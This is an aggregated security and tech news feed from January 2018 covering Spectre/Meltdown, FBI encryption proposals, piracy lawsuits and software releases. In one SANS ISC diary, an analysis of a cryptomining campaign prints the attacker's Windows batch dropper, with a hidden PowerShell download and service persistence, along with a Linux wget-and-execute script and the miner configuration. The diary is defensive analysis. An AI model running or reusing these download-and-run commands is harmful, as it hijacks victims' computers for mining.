January 12, 2018
ISC Stormcast For Friday, January 12th 2018 https://isc.sans.edu/podcastdetail.html?id=5823, (Fri, Jan 12th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
January 11, 2018
Comic for January 11, 2018 Dilbert readers - Please visit Dilbert.com to read this feature. Due to changes with our feeds, we are now making this RSS feed a link to Dilbert.com.
Introducing Nextcloud Talk Nextcloud has announced Nextcloud Talk, a fully open source video meeting software that is on-premise hosted and end-to-end encrypted. "Nextcloud Talk makes it easier than ever to host a privacy-respecting audio/video communication service for home users and enterprises. Business users have optional access to the Spreed High Performance Back-end offering enterprise-class scalability, reliability, and features through a Nextcloud subscription. With the easy-to-use interface, users can engage colleagues, friends, partners or customers, working in real time through High Definition (H265 based) audio and video in web meetings and webinars."
Fingerprinting Digital Documents
In this era of electronic leakers, remember that zero-width spaces and homoglyph substitution can fingerprint individual instances of files.
Europol Hits Huge 500,000 Subscriber Pirate IPTV Operation
Live TV is in massive demand but accessing all content in a particular region can be a hugely expensive proposition, with tradtional broadcasting monopolies demanding large subscription fees.
For millions around the world, this ‘problem’ can be easily circumvented. Pirate IPTV operations, which supply thousands of otherwise subscription channels via the Internet, are on the increase. They’re accessible for just a few dollars, euros, or pounds per month, slashing bills versus official providers on a grand scale.
This week, however, police forces around Europe coordinated to target what they claim is one of the world’s largest illicit IPTV operations. The investigation was launched last February by Europol and on Tuesday coordinated actions were carried out in Cyprus, Bulgaria, Greece, and the Netherlands.
Three suspects were arrested in Cyprus – two in Limassol (aged 43 and 44) and one in Larnaca (aged 53). All are alleged to be part of an international operation to illegally broadcast around 1,200 channels of pirated content worldwide. Some of the channels offered were illegally sourced from Sky UK, Bein Sports, Sky Italia, and Sky DE
If initial reports are to be believed, the reach of the IPTV service was huge. Figures usually need to be taken with a pinch of salt but information suggests the service had more than 500,000 subscribers, each paying around 10 euros per month. (Note: how that relates to the alleged five million euros per year in revenue is yet to be made clear)
Police action was spread across the continent, with at least nine separate raids, including in the Netherlands where servers were uncovered. However, it was determined that these were in place to hide the true location of the operation’s main servers. Similar ‘front’ servers were also deployed in other regions.
The main servers behind the IPTV operation were located in Petrich, a small town in Blagoevgrad Province, southwestern Bulgaria. No details have been provided by the authorities but TF is informed that the website of a local ISP, Megabyte-Internet, from where pirate IPTV has been broadcast for at least the past several months, disappeared on Tuesday. It remains offline this morning.
The company did not respond to our request for comment and there’s no suggestion that it’s directly involved in any illegal activity. However, its Autonomous System (AS) number reveals linked IPTV services, none of which appear to be operational today. The ISP is also listed on sites where ‘pirate’ IPTV channel playlists are compiled by users.
According to sources in Cyprus, police requested permission from the Larnaca District Court to detain the arrested individuals for eight days. However, local news outlet Philenews said that any decision would be postponed until this morning, since one of the three suspects, an English Cypriot, required an interpreter which caused a delay.
In addition to prosecutors and defense lawyers, two Dutch investigators from Europol were present in court yesterday. The hearing lasted for six hours and was said to be so intensive that the court stenographer had to be replaced due to overwork.
Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons
Security updates for Thursday Security updates have been issued by Arch Linux (glibc and lib32-glibc), Debian (ming and poco), Fedora (electron-cash, electrum, firefox, heketi, microcode_ctl, and python-jsonrpclib), openSUSE (clamav-database and ucode-intel), Red Hat (flash-plugin), SUSE (OBS toolchain), and Ubuntu (webkit2gtk).
Yet Another FBI Proposal for Insecure Communications
Deputy Attorney General Rosenstein has given talks where he proposes that tech companies decrease their communications and device security for the benefit of the FBI. In a recent talk, his idea is that tech companies just save a copy of the plaintext:
Law enforcement can also partner with private industry to address a problem we call "Going Dark." Technology increasingly frustrates traditional law enforcement efforts to collect evidence needed to protect public safety and solve crime. For example, many instant-messaging services now encrypt messages by default. The prevent the police from reading those messages, even if an impartial judge approves their interception.
The problem is especially critical because electronic evidence is necessary for both the investigation of a cyber incident and the prosecution of the perpetrator. If we cannot access data even with lawful process, we are unable to do our job. Our ability to secure systems and prosecute criminals depends on our ability to gather evidence.
I encourage you to carefully consider your company's interests and how you can work cooperatively with us. Although encryption can help secure your data, it may also prevent law enforcement agencies from protecting your data.
Encryption serves a valuable purpose. It is a foundational element of data security and essential to safeguarding data against cyber-attacks. It is critical to the growth and flourishing of the digital economy, and we support it. I support strong and responsible encryption.
I simply maintain that companies should retain the capability to provide the government unencrypted copies of communications and data stored on devices, when a court orders them to do so.
Responsible encryption is effective secure encryption, coupled with access capabilities. We know encryption can include safeguards. For example, there are systems that include central management of security keys and operating system updates; scanning of content, like your e-mails, for advertising purposes; simulcast of messages to multiple destinations at once; and key recovery when a user forgets the password to decrypt a laptop. No one calls any of those functions a "backdoor." In fact, those very capabilities are marketed and sought out.
I do not believe that the government should mandate a specific means of ensuring access. The government does not need to micromanage the engineering.
The question is whether to require a particular goal: When a court issues a search warrant or wiretap order to collect evidence of crime, the company should be able to help. The government does not need to hold the key.
Rosenstein is right that many services like Gmail naturally keep plaintext in the cloud. This is something we pointed out in our 2016 paper: "Don't Panic." But forcing companies to build an alternate means to access the plaintext that the user can't control is an enormous vulnerability.
Susan Landau's New Book: Listening In
Susan Landau has written a terrific book on cybersecurity threats and why we need strong crypto. Listening In: Cybersecurity in an Insecure Age. It's based in part on her 2016 Congressional testimony in the Apple/FBI case; it examines how the Digital Revolution has transformed society, and how law enforcement needs to -- and can -- adjust to the new realities. The book is accessible to techies and non-techies alike, and is strongly recommended.
And if you've already read it, give it a review on Amazon. Reviews sell books, and this one needs more of them.
Netflix, Amazon and Hollywood Sue Kodi-Powered Dragon Box Over Piracy
More and more people are starting to use Kodi-powered set-top boxes to stream video content to their TVs.
While Kodi itself is a neutral platform, sellers who ship devices with unauthorized add-ons give it a bad reputation.
In recent months these boxes have become the prime target for copyright enforcers, including the Alliance for Creativity and Entertainment (ACE), an anti-piracy partnership between Hollywood studios, Netflix, Amazon, and more than two dozen other companies.
After suing Tickbox last year a group of key ACE members have now filed a similar lawsuit against Dragon Media Inc, which sells the popular Dragon Box. The complaint, filed at a California federal court, also lists the company’s owner Paul Christoforo and reseller Jeff Williams among the defendants.
According to ACE, these type of devices are nothing more than pirate tools, allowing buyers to stream copyright infringing content. That also applies to Dragon Box, they inform the court.
“Defendants market and sell ‘Dragon Box,’ a computer hardware device that Defendants urge their customers to use as a tool for the mass infringement of the copyrighted motion pictures and television shows,” the complaint, picked up by HWR, reads.
The movie companies note that the defendants distribute and promote the Dragon Box as a pirate tool, using phrases such as “Watch your Favourites Anytime For FREE” and “stop paying for Netflix and Hulu.”
When users follow the instructions Dragon provides they get free access to copyrighted movies, TV-shows and live content, ACE alleges. The complaint further points out that the device uses the open source Kodi player paired with pirate addons.
“The Dragon Media application provides Defendants’ customers with a customized configuration of the Kodi media player and a curated selection of the most popular addons for accessing infringing content,” the movie companies write.
“These addons are designed and maintained for the overarching purpose of scouring the Internet for illegal sources of copyrighted content and returning links to that content. When Dragon Box customers click those links, those customers receive unauthorized streams of popular motion pictures and television shows.”
One of the addons that are included with the download and installation of the Dragon software is Covenant.
This addon can be accessed through a preinstalled shortcut which is linked under the “Videos” menu. Users are then able to browse through a large library of curated content, including a separate category of movies that are still in theaters.
According to a statement from Dragon owner Christoforo, business is going well. The company claims to have “over 250,000 customers in 50 states and 4 countries and growing” as well as “374 sellers” across the world.
With this lawsuit, however, the company’s future has suddenly become uncertain.
The movie companies ask the California District for an injunction to shut down the infringing service and impound all Dragon Box devices. In addition, they’re requesting statutory damages which can go up to several million dollars.
At the time of writing the Dragon Box website is still in on air and the company has yet to comment on the allegations.
—
A copy of the complaint is available here (pdf).
Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons
Spectre and Meltdown Attacks Against Microprocessors
The security of pretty much every computer on the planet has just gotten a lot worse, and the only real solution -- which of course is not a solution -- is to throw them all away and buy new ones.
On Wednesday, researchers just announced a series of major security vulnerabilities in the microprocessors at the heart of the world's computers for the past 15-20 years. They've been named Spectre and Meltdown, and they have to do with manipulating different ways processors optimize performance by rearranging the order of instructions or performing different instructions in parallel. An attacker who controls one process on a system can use the vulnerabilities to steal secrets elsewhere on the computer. (The research papers are here and here.)
This means that a malicious app on your phone could steal data from your other apps. Or a malicious program on your computer -- maybe one running in a browser window from that sketchy site you're visiting, or as a result of a phishing attack -- can steal data elsewhere on your machine. Cloud services, which often share machines amongst several customers, are especially vulnerable. This affects corporate applications running on cloud infrastructure, and end-user cloud applications like Google Drive. Someone can run a process in the cloud and steal data from every other users on the same hardware.
Information about these flaws has been secretly circulating amongst the major IT companies for months as they researched the ramifications and coordinated updates. The details were supposed to be released next week, but the story broke early and everyone is scrambling. By now all the major cloud vendors have patched their systems against the vulnerabilities that can be patched against.
"Throw it away and buy a new one" is ridiculous security advice, but it's what US-CERT recommends. It is also unworkable. The problem is that there isn't anything to buy that isn't vulnerable. Pretty much every major processor made in the past 20 years is vulnerable to some flavor of these vulnerabilities. Patching against Meltdown can degrade performance by almost a third. And there's no patch for Spectre; the microprocessors have to be redesigned to prevent the attack, and that will take years. (Here's a running list of who's patched what.)
This is bad, but expect it more and more. Several trends are converging in a way that makes our current system of patching security vulnerabilities harder to implement.
The first is that these vulnerabilities affect embedded computers in consumer devices. Unlike our computer and phones, these systems are designed and produced at a lower profit margin with less engineering expertise. There aren't security teams on call to write patches, and there often aren't mechanisms to push patches onto the devices. We're already seeing this with home routers, digital video recorders, and webcams. The vulnerability that allowed them to be taken over by the Mirai botnet last August simply can't be fixed.
The second is that some of the patches require updating the computer's firmware. This is much harder to walk consumers through, and is more likely to permanently brick the device if something goes wrong. It also requires more coordination. In November, Intel released a firmware update to fix a vulnerability in its Management Engine (ME): another flaw in its microprocessors. But it couldn't get that update directly to users; it had to work with the individual hardware companies, and some of them just weren't capable of getting the update to their customers.
We're already seeing this. Some patches require users to disable the computer's password, which means organizations can't automate the patch. Some antivirus software blocks the patch, or -- worse -- crashes the computer. This results in a three-step process: patch your antivirus software, patch your operating system, and then patch the computer's firmware.
The final reason is the nature of these vulnerabilities themselves. These aren't normal software vulnerabilities, where a patch fixes the problem and everyone can move on. These vulnerabilities are in the fundamentals of how the microprocessor operates.
It shouldn't be surprising that microprocessor designers have been building insecure hardware for 20 years. What's surprising is that it took 20 years to discover it. In their rush to make computers faster, they weren't thinking about security. They didn't have the expertise to find these vulnerabilities. And those who did were too busy finding normal software vulnerabilities to examine microprocessors. Security researchers are starting to look more closely at these systems, so expect to hear about more vulnerabilities along these lines.
Spectre and Meltdown are pretty catastrophic vulnerabilities, but they only affect the confidentiality of data. Now that they -- and the research into the Intel ME vulnerability -- have shown researchers where to look, more is coming -- and what they'll find will be worse than either Spectre or Meltdown. There will be vulnerabilities that will allow attackers to manipulate or delete data across processes, potentially fatal in the computers controlling our cars or implanted medical devices. These will be similarly impossible to fix, and the only strategy will be to throw our devices away and buy new ones.
This isn't to say you should immediately turn your computers and phones off and not use them for a few years. For the average user, this is just another attack method amongst many. All the major vendors are working on patches and workarounds for the attacks they can mitigate. All the normal security advice still applies: watch for phishing attacks, don't click on strange e-mail attachments, don't visit sketchy websites that might run malware on your browser, patch your systems regularly, and generally be careful on the Internet.
You probably won't notice that performance hit once Meltdown is patched, except maybe in backup programs and networking applications. Embedded systems that do only one task, like your programmable thermostat or the computer in your refrigerator, are unaffected. Small microprocessors that don't do all of the vulnerable fancy performance tricks are unaffected. Browsers will figure out how to mitigate this in software. Overall, the security of the average Internet-of-Things device is so bad that this attack is in the noise compared to the previously known risks.
It's a much bigger problem for cloud vendors; the performance hit will be expensive, but I expect that they'll figure out some clever way of detecting and blocking the attacks. All in all, as bad as Spectre and Meltdown are, I think we got lucky.
But more are coming, and they'll be worse. 2018 will be the year of microprocessor vulnerabilities, and it's going to be a wild ride.
Note: A shorter version of this essay previously appeared on CNN.com. My previous blog post on this topic contains additional links.
Mining or Nothing!, (Thu, Jan 11th)
Cryptocurrencies mining has been a trending attack for a few weeks. Our idling CPUs are now targeted by bad guys who are looked to generate some extra revenue by abusing our resources. Other fellow handlers already posted diaries about this topic. Renato found a campaign based on a WebLogic exploit[1] and Jim detected a peak of activity on port %%port:3333%%[2]. Yesterday, while reviewed alerts generated by my hunting scripts, I found an interesting snippet of code on Pastebin. Here is a copy of the script with some added comments in blue:
@shift /0 @echo off // No idea why a new service is created, there is no reference to this executable? sc create MicrsoftFTP binPath= C:\ProgramData\svchost.exe start= auto // Let’s grab the miner // Not very efficient because admin privileges are required to dump the file in this directory powershell.exe -WindowStyle Hidden $P = nEW-oBJECT sYSTEM.nET.wEBcLIENT;$P.DownloadFile('http://x.x.x.x:2114/drivers.exe', 'C:\Windows\drivers.exe') ping 1.1.1.1 -n 10>nul 2>nul set _task=drivers.exe // Miner configuration set _svr=C:\Windows\drivers.exe -o bom.dnstop[.]info:4555 -u 4BHZCKCaArVd84u …(removed)... bydit7sHgu4BAo5Rh -p x -k -B set _des=start.bat :checkstart SET status=1 // Test if the miner is running (TASKLIST|FIND /I "%_task%"||SET status=0) 2>nul 1>nul ECHO %status% // If not running, (re)start it or sleep IF %status% EQU 1 (goto checkag ) ELSE (goto startsvr) // Create the start.bat script and launch the miner :startsvr echo %time% // Original strings were in Chinese // Translation: "******** Program started ********" echo ********??????******** // Translation: "The program restarts at% time%, check the system log" echo ??????? %time% ,??????? >> restart_service.txt echo start %_svr% > %_des% echo exit >> %_des% start %_des% set/p=.<nul for /L %%i in (1 1 10) do set /p a=.<nul&ping.exe /n 2 127.0.0.1>nul echo . echo Wscript.Sleep WScript.Arguments(0) >%tmp%\delay.vbs cscript //b //nologo %tmp%\delay.vbs 10000 del %_des% /Q // Translation: "******** Program completed ********" echo ********??????******** goto checkstart // Simple sleep function based on a VBS one-liner script :checkag // Translation: "% time% The program is running normally, and it will be checked after 10 seconds." echo %time% ??????,10??????.. echo Wscript.Sleep WScript.Arguments(0) >%tmp%\delay.vbs cscript //b //nologo %tmp%\delay.vbs 10000 goto checkstart :begin REM
The file referenced in the script (‘drivers.exe’) is not available anymore (HTTP 404 returned) but the server is running an HttpFileServer[3] instance which is very popular in China (I found plenty of them on Chinese servers).
You can see multiple files and installation script to deploy mining tools in Windows but also Linux boxes. Example:
cd /tmp wget -O xmrigDaemon http://x.x.x.x:2114/xmrigDaemon && chmod +x xmrigDaemon wget -O xmrigMiner http://x.x.x.x:2114/xmrigMiner && chmod +x xmrigMiner wget -O config.json http://x.x.x.x:2114/config.json && chmod +x config.json chmod +x xmrigDaemon chmod +x xmrigMiner chmod +x config.json ./xmrigDaemon &
Even more interesting, the configuration is publicly available (config.json) and contains a lot of details about the attacker:
{
"algo": "cryptonight", // cryptonight (default) or cryptonight-lite
"av": 0, // algorithm variation, 0 auto select
"doublehash-thread-mask" : null, // for av=2/4 only, limits doublehash to given threads (mask), mask "0x3" means run doublehash on thread 0 and 1 only (default: all threads)
"background": true, // true to run the miner in the background
"colors": true, // false to disable colored output
"cpu-affinity": null, // set process affinity to CPU core(s), mask "0x3" for cores 0 and 1
"cpu-priority": null, // set process priority (0 idle, 2 normal to 5 highest)
"donate-level": 1, // donate level, mininum 1%
"log-file": null, // log all output to a file, example: "c:/some/path/xmrig.log"
"max-cpu-usage": 100, // maximum CPU usage for automatic mode, usually limiting factor is CPU cache not this option.
"print-time": 60, // print hashrate report every N seconds
"retries": 5, // number of times to retry before switch to backup server
"retry-pause": 5, // time to pause between retries
"safe": false, // true to safe adjust threads and av settings for current CPU
"syslog": false, // use system log for output messages
"threads": null, // number of miner threads
"pools": [
{
"url": “bom.dnstop[.]info:2222", // URL of mining server
"user": “4BHZCKCaArVd84uydsakdzVHRtBJqG …(removed)… 3bBJJESH28YHbydit7sHgu4BAo5Rh", // username for mining server
"pass": “Lall …(removed)… ", // password for mining server
"keepalive": true, // send keepalived for prevent timeout (need pool support)
"nicehash": false // enable nicehash/xmrig-proxy support
}
],
"api": {
"port": 0, // port for the miner API https://github.com/xmrig/xmrig/wiki/API
"access-token": null, // access token for API
"worker-id": null // custom worker-id for API
},
"cc-client": {
"url": "bom.dnstop.info:3324", // url of the CC Server (ip:port)
"access-token": "mySecret", // access token for CC Server (has to be the same in config_cc.json)
"worker-id": null, // custom worker-id for CC Server (otherwise hostname is used)
"update-interval-s": 10 // status update interval in seconds (default: 10 min: 1)
}
}
Here is a table with files details:
| Name | MD5 | Type | VT Score |
|---|---|---|---|
| discuz | 588dcdd23deb25d99b0924ef96e4681f | ELF 32bits | Unknown |
| discuz.exe | 08855aa283b692347bcabb48d6f8bcdf | PE32 | 52/68 |
| lpost.exe | 6a33d25fa28fd865a5e2fa43250e64dd | PE32 | 51/68 |
| master.exe | b5cc55f84c0d4f4b86f76956f94b170d | PE32 | 42/68 |
| ss1s.exe | bb2d8d8c8087073d83a7226c4a44296b | PE32 | 15/67 |
| svchost.exe | 6a33d25fa28fd865a5e2fa43250e64dd | PE32 | 51/68 |
| xmrigDaemon | 7dc04d39f2786eceab4fbf2cf16eded6 | ELF 32bits | Unknown |
| xmrigDaemon-2 | 710f2be21798478cc2f534ee2eb7b800 | ELF 64bits | 1/60 |
| xmrigMiner | b87982f5f938b2a7c9852a5de63bbc68 | ELF 32bits | Unknown |
| xmrigMiner-2 | f8cb16918b42505abe547da37b9614a9 | ELF 64bits | 14/60 |
[1] https://isc.sans.edu/forums/diary/Campaign+is+using+a+recently+released+WebLogic+exploit+to+deploy+a+Monero+miner/23191/
[2] https://isc.sans.edu/forums/diary/What+is+going+on+with+port+3333/23215/
[3] http://rejetto.com/hfs/
Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant
PGP Key
ISC Stormcast For Thursday, January 11th 2018 https://isc.sans.edu/podcastdetail.html?id=5821, (Thu, Jan 11th) (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
[$] LWN.net Weekly Edition for January 11, 2018 The LWN.net Weekly Edition for January 11, 2018 is available.
January 10, 2018
Comic for January 10, 2018 Dilbert readers - Please visit Dilbert.com to read this feature. Due to changes with our feeds, we are now making this RSS feed a link to Dilbert.com.
[$] Eelo seeks to make a privacy-focused phone
A focus on privacy is a key feature being touted by a number of different projects these days—from KDE to Tails to Nextcloud. One of the biggest privacy leaks for most people is their phone, so it is no surprise that there are projects looking to address that as well. A new entrant in that category is eelo, which is a non-profit project aimed at producing not only a phone, but also a suite of web services. All of that could potentially replace the Google or Apple mothership, which tend to collect as much personal data as possible.
Judge Issues Devastating Order Against BitTorrent Copyright Troll
In recent years, file-sharers around the world have been pressured to pay significant settlement fees, or face legal repercussions.
These so-called “copyright trolling” efforts have been a common occurrence in the United States since the turn of the last decade.
Increasingly, however, courts are growing weary of these cases. Many districts have turned into no-go zones for copyright trolls and the people behind Prenda law were arrested and are being prosecuted in a criminal case.
In the Western District of Washington, the tide also appears to have turned. After Venice PI, a copyright holder of the film “Once Upon a Time in Venice”, sued a man who later passed away, concerns were raised over the validity of the evidence.
Venice PI responded to the concerns with a declaration explaining its data gathering technique and assuring the Court that false positives are out of the question.
That testimony didn’t help much though, as a recently filed minute order shows this week. The order applies to a dozen cases and prohibits the company from reaching out to any defendants until further notice, as there are several alarming issues that have to be resolved first.
One of the problems is that Venice PI declared that it’s owned by a company named Lost Dog Productions, which in turn is owned by Voltage Productions. Interestingly, these companies don’t appear in the usual records.
“A search of the California Secretary of State’s online database, however, reveals no registered entity with the name ‘Lost Dog’ or ‘Lost Dog Productions’,” the Court notes.
“Moreover, although ‘Voltage Pictures, LLC’ is registered with the California Secretary of State, and has the same address as Venice PI, LLC, the parent company named in plaintiff’s corporate disclosure form, ‘Voltage Productions, LLC,’ cannot be found in the California Secretary of State’s online database and does not appear to exist.”
In other words, the company that filed the lawsuit, as well as its parent company, are extremely questionable.
While the above is a reason for concern, it’s just the tip of the iceberg. The Court not only points out administrative errors, but it also has serious doubts about the evidence collection process. This was carried out by the German company MaverickEye, which used the tracking technology of another German company, GuardaLey.
GuardaLey CEO Benjamin Perino, who claims that he coded the tracking software, wrote a declaration explaining that the infringement detection system at issue “cannot yield a false positive.” However, the Court doubts this statement and Perino’s qualifications in general.
“Perino has been proffered as an expert, but his qualifications consist of a technical high school education and work experience unrelated to the peer-to-peer file-sharing technology known as BitTorrent,” the Court writes.
“Perino does not have the qualifications necessary to be considered an expert in the field in question, and his opinion that the surveillance program is incapable of error is both contrary to common sense and inconsistent with plaintiff’s counsel’s conduct in other matters in this district. Plaintiff has not submitted an adequate offer of proof”
It seems like the Court would prefer to see an assessment from a qualified independent expert instead of the person who wrote the software. For now, this means that the IP-address evidence, in these cases, is not good enough. That’s quite a blow for the copyright holder.
If that wasn’t enough the Court also highlights another issue that’s possibly even more problematic. When Venice PI requested the subpoenas to identify alleged pirates, they relied on declarations from Daniel Arheidt, a consultant for MaverickEye.
These declarations fail to mention, however, that MaverickEye has the proper paperwork to collect IP addresses.
“Nowhere in Arheidt’s declarations does he indicate that either he or MaverickEye is licensed in Washington to conduct private investigation work,” the order reads.
This is important, as doing private investigator work without a license is a gross misdemeanor in Washington. The copyright holder was aware of this requirement because it was brought up in related cases in the past.
“Plaintiff’s counsel has apparently been aware since October 2016, when he received a letter concerning LHF Productions, Inc. v. Collins, C16-1017 RSM, that Arheidt might be committing a crime by engaging in unlicensed surveillance of Washington citizens, but he did not disclose this fact to the Court.”
The order is very bad news for Venice PI. The company had hoped to score a few dozen easy settlements but the tables have now been turned. The Court instead asks the company to explain the deficiencies and provide additional details. In the meantime, the copyright holder is urged not to spend or transfer any of the settlement money that has been collected thus far.
The latter indicates that Venice PI might have to hand defendants their money back, which would be pretty unique.
The order suggests that the Judge is very suspicious of these trolling activities. In a footnote there’s a link to a Fight Copyright Trolls article which revealed that the same counsel dismissed several cases, allegedly to avoid having IP-address evidence scrutinized.
Even more bizarrely, in another footnote the Court also doubts if MaverickEye’s aforementioned consultant, Daniel Arheidt, actually exists.
“The Court has recently become aware that Arheidt is the latest in a series of German declarants (Darren M. Griffin, Daniel Macek, Daniel Susac, Tobias Fieser, Michael Patzer) who might be aliases or even fictitious.
“Plaintiff will not be permitted to rely on Arheidt’s declarations or underlying data without explaining to the Court’s satisfaction Arheidt’s relationship to the above-listed declarants and producing proof beyond a reasonable doubt of Arheidt’s existence,” the court adds.
These are serious allegations, to say the least.
If a copyright holder uses non-existent companies and questionable testimony from unqualified experts after obtaining evidence illegally to get a subpoena backed by a fictitious person….something’s not quite right.
—
A copy of the minute order, which affects a series of cases, is available here (pdf).
Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons
A tribute to James Dolan, co-creator of SecureDrop Freedom of the Press Foundation has a tribute to James Dolan, who died over the holidays at the age of 36. James worked with Aaron Swartz and journalist Kevin Poulsen to build the original prototype of SecureDrop, an open-source whistleblower submission system. "He was our first full-time employee at Freedom of the Press Foundation, and quickly set out to teach other developers, contributors, and anyone interested in how the system worked. He poured his heart and soul into the work, traveling to newsrooms around North America to teach IT staffs and journalists in person how to install and use SecureDrop. He completely reworked the installation process, he pushed us to get independent security audits of the system, and he helped us hire the initial team that would take over SecureDrop once he was gone." LWN covered a LibrePlanet talk on SecureDrop back in March 2017. (Thanks to Paul Wise)
Stable kernel updates Greg Kroah-Hartman has released stable kernels 4.14.13, 4.9.76, and 4.4.111. As usual, they all contain important fixes and users should update.
Security updates for Wednesday Security updates have been issued by Debian (awstats, gdk-pixbuf, plexus-utils, and plexus-utils2), Fedora (asterisk, gimp, heimdal, libexif, linux-firmware, mupdf, poppler, thunderbird, webkitgtk4, wireshark, and xrdp), openSUSE (diffoscope, irssi, and qemu), SUSE (java-1_7_0-ibm, kernel-firmware, and qemu), and Ubuntu (irssi, kernel, linux, linux-aws, linux-euclid, linux-kvm, linux-hwe, linux-azure, linux-gcp, linux-oem, linux-lts-trusty, linux-lts-xenial, linux-lts-xenial, linux-aws, linux-raspi2, ruby1.9.1, ruby2.3, and sssd).
Detecting Adblocker Blockers
Interesting research on the prevalence of adblock blockers: "Measuring and Disrupting Anti-Adblockers Using Differential Execution Analysis":
Abstract: Millions of people use adblockers to remove intrusive and malicious ads as well as protect themselves against tracking and pervasive surveillance. Online publishers consider adblockers a major threat to the ad-powered "free" Web. They have started to retaliate against adblockers by employing anti-adblockers which can detect and stop adblock users. To counter this retaliation, adblockers in turn try to detect and filter anti-adblocking scripts. This back and forth has prompted an escalating arms race between adblockers and anti-adblockers.
We want to develop a comprehensive understanding of anti-adblockers, with the ultimate aim of enabling adblockers to bypass state-of-the-art anti-adblockers. In this paper, we present a differential execution analysis to automatically detect and analyze anti-adblockers. At a high level, we collect execution traces by visiting a website with and without adblockers. Through differential execution analysis, we are able to pinpoint the conditions that lead to the differences caused by anti-adblocking code. Using our system, we detect anti-adblockers on 30.5% of the Alexa top-10K websites which is 5-52 times more than reported in prior literature. Unlike prior work which is limited to detecting visible reactions (e.g., warning messages) by anti-adblockers, our system can discover attempts to detect adblockers even when there is no visible reaction. From manually checking one third of the detected websites, we find that the websites that have no visible reactions constitute over 90% of the cases, completely dominating the ones that have visible warning messages. Finally, based on our findings, we further develop JavaScript rewriting and API hooking based solutions (the latter implemented as a Chrome extension) to help adblockers bypass state-of-the-art anti-adblockers.
News article.
notmuch release 0.26 now available Version 0.26 of the notmuch email client/indexer is available with a long list of new features. "It's now possible to include the cleartext of encrypted e-mails in the notmuch index. This makes it possible to search your encrypted e-mails with the same ease as searching cleartext."
Spectre and Meltdown Attacks
After a week or so of rumors, everyone is now reporting about the Spectre and Meltdown attacks against pretty much every modern processor out there.
These are side-channel attacks where one process can spy on other processes. They affect computers where an untrusted browser window can execute code, phones that have multiple apps running at the same time, and cloud computing networks that run lots of different processes at once. Fixing them either requires a patch that results in a major performance hit, or is impossible and requires a re-architecture of conditional execution in future CPU chips.
I'll be writing something for publication over the next few days. This post is basically just a link repository.
EDITED TO ADD: Good technical explanation. And a Slashdot thread.
EDITED TO ADD (1/5): Another good technical description. And how the exploits work through browsers. A rundown of what vendors are doing. Nicholas Weaver on its effects on individual computers.
EDITED TO ADD (1/7): xkcd.
EDITED TO ADD (1/10): Another good technical description.
Nearly social, on Linkedin
I am getting nearly social on Linkedin. Name: Georgi Guninski URL: https://www.linkedin.com/in/georgi-guninski-b0069a156
O'Callahan: The Fight For Patent-Unencumbered Media Codecs Is Nearly Won Robert O'Callahan notes an important development in the fight for media codecs without patent issues. "Apple joining the Alliance for Open Media is a really big deal. Now all the most powerful tech companies — Google, Microsoft, Apple, Mozilla, Facebook, Amazon, Intel, AMD, ARM, Nvidia — plus content providers like Netflix and Hulu are on board. I guess there's still no guarantee Apple products will support AV1, but it would seem pointless for Apple to join AOM if they're not going to use it: apparently AOM membership obliges Apple to provide a royalty-free license to any 'essential patents' it holds for AV1 usage."
Cybersecurity and the 2017 US National Security Strategy
Commentaries on the 2017 US national security strategy by Michael Sulmeyer and Ben Buchanan.
RuTracker Reveals Innovative Plan For Users to Subvert ISP Blocking
As Russia’s largest torrent site and one that earned itself a mention in TF’s list of most popular torrent sites 2018, RuTracker is continuously under fire.
The site has an extremely dedicated following but Russia’s telecoms watchdog, spurred on by copyright holders brandishing court rulings, does everything in its power to ensure that people can’t access the site easily.
As a result, RuTracker’s main domains are blocked by all ISPs, meaning that people have to resort to VPNs or the many dozens of proxy and mirror sites that have been set up to facilitate access to the popular tracker.
While all of these methods used to work just fine, new legislation that came into force during October means that mirror and proxy sites can be added to block lists without copyright holders having to return to court. And, following legislation introduced in November, local VPN services are forbidden from providing access to blocked sites.
While RuTracker has always insisted that web blockades have little effect on the numbers of people sharing content, direct traffic to their main domains has definitely suffered. To solve this problem and go some way towards mitigating VPN and proxy bans, the site has just come up with a new plan to keep the torrents flowing.
The scheme was quietly announced, not on RuTracker’s main forum, but to a smaller set of users on local site Leprosorium. The idea was that a quieter launch there would allow for controlled testing before a release to the masses. The project is called My.RuTracker and here’s how it works.
Instead of blocked users fruitlessly trying to find public circumvention methods that once seen are immediately blocked, they are invited to register their own domains. These can be single use, for the person who registers them, but it’s envisioned that they’ll be shared out between friends, family, and online groups, to better make use of the resource.
Once domains are registered, users are invited to contact a special user account on the RuTracker site (operated by the site’s operators) which will provide them with precise technical details on how to set up their domain (.ru domains are not allowed) to gain access to RuTracker.
“In response, after a while (usually every other day), a list of NS-addresses will be sent to the registrar’s domain settings. Under this scheme, the user domain will be redirected to the RuTracker site via a dynamic IP address: this will avoid blocking the torrent tracker for a particular IP address,” the scheme envisages.
According to local news resource Tjournal, 62 personal mirrors were launched following the initial appeal, with the operators of RuTracker now planning to publicly announce the project to their community. As more are added, the site will keep track of traffic from each of the personal “mirrors” for balancing the load on the site.
At least in theory, this seems like a pretty innovative scheme. Currently, the authorities rely on the scale and public awareness of a particular proxy or mirror in order to earmark it for blocking. This much more decentralized plan, in which only small numbers of people should know each domain, seems like a much more robust system – at least until the authorities and indeed the law catches up.
And so the cat-and-mouse game continues.
Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN discounts, offers and coupons
GitHub InfoSec Threepeat: HELK, ptf, and VulnWhisperer, (Wed, Jan 10th)
There are numerous and exciting information security-related projects on GitHub; one can dive quickly down the rabbit hole, never to be seen again, in an effort to identify the best of breed for use in their security practices. In the last three days, three separate projects have hit my radar screen via social media that I thought readers might find intriguing and likely beneficial. I'm listing the projects in alphabetic order, not order of preference, each project represents a unique discipline and opportunity.
The first project is for hunters. HELK is a Hunting ELK (Elasticsearch, Logstash, Kibana) stack with advanced analytic capabilities, currently in beta. This project hits themes near and dear to me, and will definitely receive toolsmith attention in the near term. From @Cyb3rWard0g, HELK aims to:
- Provide a free hunting platform to the community and share the basics of Threat Hunting.
- Make sense of a large amount of event logs and add more context to suspicious events during hunting.
- Expedite the time it takes to deploy an ELK stack.
